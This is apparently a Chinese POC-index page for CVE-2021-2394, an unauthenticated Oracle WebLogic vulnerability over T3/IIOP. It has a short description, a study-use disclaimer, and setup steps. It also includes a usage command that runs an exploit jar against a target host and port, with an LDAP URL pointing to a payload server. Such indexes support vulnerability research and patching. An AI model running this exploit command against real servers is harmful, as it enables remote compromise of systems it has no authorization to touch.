关联漏洞
标题:Oracle Fusion Middleware输入验证错误漏洞 (CVE-2021-2394)Description:Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。 Oracle Fusion Middleware 存在安全漏洞,未经身份验证的攻击者可利用该漏洞通过T3,IIOP进行网络访问,以破坏Oracle WebLogic服务器。以下产品及版本受到影响:Oracle Fusion Middleware 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.
Description
POC of CVE-2021-2394
介绍
# CVE-2021-2394
POC of CVE-2021-2394
- 免责声明
- 项目仅供学习使用,任何未授权检测造成的直接或者间接的后果及损失,均由使用者本人负责
* 注意事项
* POC使用IIOP发包,请添加相关依赖(已将12.2.1.3.0版本的依赖放release)
* 请使用低版本的jdk安装weblogic进行测试
* 使用方法:
* 启动一个ldap服务
* `java -jar CVE_2021_2394.jar rhost rport ldapurl`
* eg:`java -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/Exploit`
* 参考链接:
* https://mp.weixin.qq.com/s/onoMpyenDkMmsoGEw8VO2A
* https://github.com/Y4er/CVE-2020-14756
文件快照
[4.0K] /data/pocs/a9b6512dbf45762bdc473040c85f1ae161aa636e
├── [6.0K] CVE_2021_2394.java
├── [ 653] README.md
└── [2.5K] Reflections.java
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。